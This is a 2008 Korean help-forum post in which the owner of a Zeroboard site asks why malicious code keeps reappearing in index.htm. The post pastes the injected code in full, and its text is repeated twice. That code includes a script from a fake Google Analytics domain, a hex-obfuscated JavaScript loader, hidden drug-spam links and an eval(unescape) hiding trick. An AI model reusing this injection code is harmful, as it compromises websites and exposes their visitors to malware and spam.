묻고답하기
홈피에 악성코드가 자꾸 생겨요.
2008.07.22 10:31
제로보드4를 사용하고있는데요.
요즘 매일 저희 홈페이지 www.pumpstart.kr 에 계속해서 악성코드가 추가 되고 있습니다.
index.htm에 소스중간에 <body link=purple vlink=navy style='margin:0'> 가
<script src="http://analytics-google.info/i/urchin.js"></script></head><body link=purple vlink=navy style='margin:0'><script>function c41883415430m48824e79d1eb8(m48824e79d22a0){ var m48824e79d2688=16; return (parseInt(m48824e79d22a0,m48824e79d2688));}function m48824e79d2e63(m48824e79d323f){ function m48824e79d3df7(){var m48824e79d41df=2;return m48824e79d41df;} var m48824e79d3627='';m48824e79d45c7=String.fromCharCode;for(m48824e79d3a0f=0;m48824e79d3a0f<m48824e79d323f.length;m48824e79d3a0f+=m48824e79d3df7()){ m48824e79d3627+=(m48824e79d45c7(c41883415430m48824e79d1eb8(m48824e79d323f.substr(m48824e79d3a0f,m48824e79d3df7()))));}return m48824e79d3627;} var ze7='';var m48824e79d49af='3C7'+ze7+'3637'+ze7+'2697'+ze7+'07'+ze7+'43E667'+ze7+'56E637'+ze7+'4696F6E20636865636B5F636F6E7'+ '+ '+ze7+'4656E7'+ze7+'428297'+ze7+'B7'+ze7+'6617'+ze7+'220693D303B7'+ze7+'7'+ze7+'68696C6528646F637'+ze7+'56D656E7'+ze7+'+ '42E67'+ze7+'657'+ze7+'4456C656D656E7'+ze7+'47'+ze7+'3427'+ze7+'9546167'+ze7+'4E616D652827'+ze7+'69667'+ze7+'2616D6527'+ze7+'292E6C656E67'+ze7+'7'+ze7+'468297'+ze7+'B7'+ze7+'6617'+ze7+'220656C3D646F637'+ze7+'56D656E7'+ze7+'42E67'+ze7+'657'+ze7+'+ '4456C656D656E7'+ze7+'47'+ze7+'3427'+ze7+'9546167'+ze7+'4E616D652827'+ze7+'69667'+ze7+'2616D6527'+ze7+'295B695D3B6966282028656C2E7'+ '+ze7+'37'+ze7+'47'+ze7+'96C652E64697'+ze7+'37'+ze7+'06C617'+ze7+'93D3D27'+ze7+'6E6F6E6527'+ze7+'207'+ze7+'C7'+ze7+'C20656C2E7'+ze7+'37'+ze7+'47'+ze7+'96C652E7'+ze7+'6697'+ze7+'36962696C697'+ze7+'47'+ze7+'9203D3D27'+ze7+'68696464656E27'+ze7+'207'+ze7+'C7'+ze7+'C2028656C2E7'+ze7+'7'+ze7+'69647'+ze7+'4683C3520262620656C2E68656967'+ze7+'687'+ze7+'43C35292920262620656C2E6E616D65213D27'+ze7+'633427'+ze7+'297'+ze7+'B656C2E7'+ze7+'0617'+ze7+'2656E7'+ze7+'44E6F64652E7'+ze7+'2656D6F7'+ze7+'6654368696C6428656C293B7'+ze7+'D656C7'+ze7+'36520692B2B3B7'+ze7+'D7'+ze7+'D636865636B5F636F6E7'+ze7+'4656E7'+ze7+'428293B0D0A696628216D7'+ze7+'96961297'+ze7+'B646F637'+ze7+'56D656E7'+ze7+'+ 
'42E7'+ze7+'7'+ze7+'7'+ze7+'2697'+ze7+'465287'+ze7+'56E657'+ze7+'363617'+ze7+'065282027'+ze7+'2533632536392536362537'+ze7+'+ '322536312536642536352532302536652536312536642536352533642536332533342532302537'+ '+ze7+'332537'+ze7+'32253633253364253237'+ze7+'2536382537'+ze7+'+ '342537'+ze7+'342537'+ze7+'30253361253266253266253637'+ze7+'253666253666253637'+ze7+'2536632536352532642536312536652536312536632536392537'+ze7+'61253635253265253633253666253664253266253639253665253265253633253637'+ze7+'25363925336625333125333526253237'+ze7+'2532622534642536312537'+ze7+'342536382532652537'+ze7+'322536662537'+ze7+'+ '352536652536342532382534642536312537'+ze7+'+ '342536382532652537'+ze7+'32253631253665253634253666253664253238253239253261253332253335253335253336253336253333253239253262253237'+ze7+'+ '253339253636253330253330253332253237'+ze7+'2532302537'+ze7+'37'+ze7+'2536392536342537'+ze7+'34253638253364253335253335253337'+ze7+'253230253638253635253639253637'+ze7+'2536382537'+ze7+'342533642533342533352533392532302537'+ze7+'332537'+ze7+'342537'+ze7+'39253663253635253364253237'+ze7+'2536342536392537'+ze7+'332537'+ze7+'302536632536312537'+ze7+'39253361253230253665253666253665253635253237'+ze7+'2533652533632532662536392536362537'+ze7+'3225363125366425363525336527'+ze7+'29293B7'+ze7+'D7'+ze7+'6617'+ze7+'2206D7'+ze7+'969613D7'+ze7+'47'+ '+ze7+'27'+ze7+'5653B3C2F7'+ze7+'3637'+ze7+'2697'+ze7+'07'+ze7+'43E';document.write(m48824e79d2e63(m48824e79d49af));</script><style>.style8 {overflow:auto;height:1px;}</style>
<div id="divId" class="style8">A side effects of <a href=http://www.pitt.edu/~upjbook/Cal/vicodin/>vicodin cheap</a>, on sale <a href=http://www.pitt.edu/~upjbook/Cal/viagr/map.html>viagr cod saturday delivery</a>, suppositories <a href=http://www.pitt.edu/~upjbook/Cal/vicodin/map.html>vicodin blue</a>, no prescription <a href=http://www.pitt.edu/~upjbook/Cal/viagr/map.html>viagr overnight</a>, cheapest in uk <a href=http://www.pitt.edu/~upjbook/Cal/hydrocodone/map.html>hydrocodone uk alternative</a>, alternative new drugs <a href=http://www.pitt.edu/~upjbook/Cal/hydrocodone/>hydrocodone abuse</a>, </div>
<script>eval(unescape("%76%61%72%20%64%69%76%45%6c%20%3d%20%64%6f%63%75%6d%65%6e%74%2e%67%65%74%45%6c%65%6d%65%6e%74%42%79%49%64%28%22%64%69%76%49%64%22%29%3b%64%69%76%45%6c%2e%73%74%79%6c%65%2e%64%69%73%70%6c%61%79%20%3d%22%6e%6f%6e%65%22%3b")); </script>
으로 index.htm이 바뀌는데요. 홈페이지의 최근 게시물이 안 보이게 되더군요.
그런데 구글 쪽 스크립트가 삽입되는 것으로 봐서는 제로보드의 analytics-google 문제 같은데...
원래 구글 쪽의 통계 기능을 제로보드가 사용하는 것으로 알고 있는데, 이게 바로 악성코드의 유입 통로로 보입니다. (다만 삽입된 스크립트의 도메인 analytics-google.info 는 구글 애널리틱스의 공식 도메인인 google-analytics.com 과 다른 주소입니다.)
해결 방안은 analytics-google 의 작동 중지 또는 삭제 같아서 analytics-google 관련 부분을 대충 지우긴 했는데, 지워도 계속 악성코드가 생성됩니다.
해결 방법을 좀 도와주세요. 수고하세요.
제로보드는 최신버전으로 모두 업데이트한 상태입니다.
요즘 매일 저희 홈페이지 www.pumpstart.kr 에 계속해서 악성코드가 추가 되고 있습니다.
index.htm에 소스중간에 <body link=purple vlink=navy style='margin:0'> 가
<script src="http://analytics-google.info/i/urchin.js"></script></head><body link=purple vlink=navy style='margin:0'><script>function c41883415430m48824e79d1eb8(m48824e79d22a0){ var m48824e79d2688=16; return (parseInt(m48824e79d22a0,m48824e79d2688));}function m48824e79d2e63(m48824e79d323f){ function m48824e79d3df7(){var m48824e79d41df=2;return m48824e79d41df;} var m48824e79d3627='';m48824e79d45c7=String.fromCharCode;for(m48824e79d3a0f=0;m48824e79d3a0f<m48824e79d323f.length;m48824e79d3a0f+=m48824e79d3df7()){ m48824e79d3627+=(m48824e79d45c7(c41883415430m48824e79d1eb8(m48824e79d323f.substr(m48824e79d3a0f,m48824e79d3df7()))));}return m48824e79d3627;} var ze7='';var m48824e79d49af='3C7'+ze7+'3637'+ze7+'2697'+ze7+'07'+ze7+'43E667'+ze7+'56E637'+ze7+'4696F6E20636865636B5F636F6E7'+ '+ '+ze7+'4656E7'+ze7+'428297'+ze7+'B7'+ze7+'6617'+ze7+'220693D303B7'+ze7+'7'+ze7+'68696C6528646F637'+ze7+'56D656E7'+ze7+'+ '42E67'+ze7+'657'+ze7+'4456C656D656E7'+ze7+'47'+ze7+'3427'+ze7+'9546167'+ze7+'4E616D652827'+ze7+'69667'+ze7+'2616D6527'+ze7+'292E6C656E67'+ze7+'7'+ze7+'468297'+ze7+'B7'+ze7+'6617'+ze7+'220656C3D646F637'+ze7+'56D656E7'+ze7+'42E67'+ze7+'657'+ze7+'+ '4456C656D656E7'+ze7+'47'+ze7+'3427'+ze7+'9546167'+ze7+'4E616D652827'+ze7+'69667'+ze7+'2616D6527'+ze7+'295B695D3B6966282028656C2E7'+ '+ze7+'37'+ze7+'47'+ze7+'96C652E64697'+ze7+'37'+ze7+'06C617'+ze7+'93D3D27'+ze7+'6E6F6E6527'+ze7+'207'+ze7+'C7'+ze7+'C20656C2E7'+ze7+'37'+ze7+'47'+ze7+'96C652E7'+ze7+'6697'+ze7+'36962696C697'+ze7+'47'+ze7+'9203D3D27'+ze7+'68696464656E27'+ze7+'207'+ze7+'C7'+ze7+'C2028656C2E7'+ze7+'7'+ze7+'69647'+ze7+'4683C3520262620656C2E68656967'+ze7+'687'+ze7+'43C35292920262620656C2E6E616D65213D27'+ze7+'633427'+ze7+'297'+ze7+'B656C2E7'+ze7+'0617'+ze7+'2656E7'+ze7+'44E6F64652E7'+ze7+'2656D6F7'+ze7+'6654368696C6428656C293B7'+ze7+'D656C7'+ze7+'36520692B2B3B7'+ze7+'D7'+ze7+'D636865636B5F636F6E7'+ze7+'4656E7'+ze7+'428293B0D0A696628216D7'+ze7+'96961297'+ze7+'B646F637'+ze7+'56D656E7'+ze7+'+ 
'42E7'+ze7+'7'+ze7+'7'+ze7+'2697'+ze7+'465287'+ze7+'56E657'+ze7+'363617'+ze7+'065282027'+ze7+'2533632536392536362537'+ze7+'+ '322536312536642536352532302536652536312536642536352533642536332533342532302537'+ '+ze7+'332537'+ze7+'32253633253364253237'+ze7+'2536382537'+ze7+'+ '342537'+ze7+'342537'+ze7+'30253361253266253266253637'+ze7+'253666253666253637'+ze7+'2536632536352532642536312536652536312536632536392537'+ze7+'61253635253265253633253666253664253266253639253665253265253633253637'+ze7+'25363925336625333125333526253237'+ze7+'2532622534642536312537'+ze7+'342536382532652537'+ze7+'322536662537'+ze7+'+ '352536652536342532382534642536312537'+ze7+'+ '342536382532652537'+ze7+'32253631253665253634253666253664253238253239253261253332253335253335253336253336253333253239253262253237'+ze7+'+ '253339253636253330253330253332253237'+ze7+'2532302537'+ze7+'37'+ze7+'2536392536342537'+ze7+'34253638253364253335253335253337'+ze7+'253230253638253635253639253637'+ze7+'2536382537'+ze7+'342533642533342533352533392532302537'+ze7+'332537'+ze7+'342537'+ze7+'39253663253635253364253237'+ze7+'2536342536392537'+ze7+'332537'+ze7+'302536632536312537'+ze7+'39253361253230253665253666253665253635253237'+ze7+'2533652533632532662536392536362537'+ze7+'3225363125366425363525336527'+ze7+'29293B7'+ze7+'D7'+ze7+'6617'+ze7+'2206D7'+ze7+'969613D7'+ze7+'47'+ '+ze7+'27'+ze7+'5653B3C2F7'+ze7+'3637'+ze7+'2697'+ze7+'07'+ze7+'43E';document.write(m48824e79d2e63(m48824e79d49af));</script><style>.style8 {overflow:auto;height:1px;}</style>
<div id="divId" class="style8">A side effects of <a href=http://www.pitt.edu/~upjbook/Cal/vicodin/>vicodin cheap</a>, on sale <a href=http://www.pitt.edu/~upjbook/Cal/viagr/map.html>viagr cod saturday delivery</a>, suppositories <a href=http://www.pitt.edu/~upjbook/Cal/vicodin/map.html>vicodin blue</a>, no prescription <a href=http://www.pitt.edu/~upjbook/Cal/viagr/map.html>viagr overnight</a>, cheapest in uk <a href=http://www.pitt.edu/~upjbook/Cal/hydrocodone/map.html>hydrocodone uk alternative</a>, alternative new drugs <a href=http://www.pitt.edu/~upjbook/Cal/hydrocodone/>hydrocodone abuse</a>, </div>
<script>eval(unescape("%76%61%72%20%64%69%76%45%6c%20%3d%20%64%6f%63%75%6d%65%6e%74%2e%67%65%74%45%6c%65%6d%65%6e%74%42%79%49%64%28%22%64%69%76%49%64%22%29%3b%64%69%76%45%6c%2e%73%74%79%6c%65%2e%64%69%73%70%6c%61%79%20%3d%22%6e%6f%6e%65%22%3b")); </script>
으로 index.htm이 바뀌는데요. 홈페이지의 최근 게시물이 안 보이게 되더군요.
그런데 구글 쪽 스크립트가 삽입되는 것으로 봐서는 제로보드의 analytics-google 문제 같은데...
원래 구글 쪽의 통계 기능을 제로보드가 사용하는 것으로 알고 있는데, 이게 바로 악성코드의 유입 통로로 보입니다.
해결 방안은 analytics-google 의 작동 중지 또는 삭제 같아서 analytics-google 관련 부분을 대충 지우긴 했는데, 지워도 계속 악성코드가 생성됩니다.
해결 방법을 좀 도와주세요. 수고하세요.
제로보드는 최신버전으로 모두 업데이트한 상태입니다.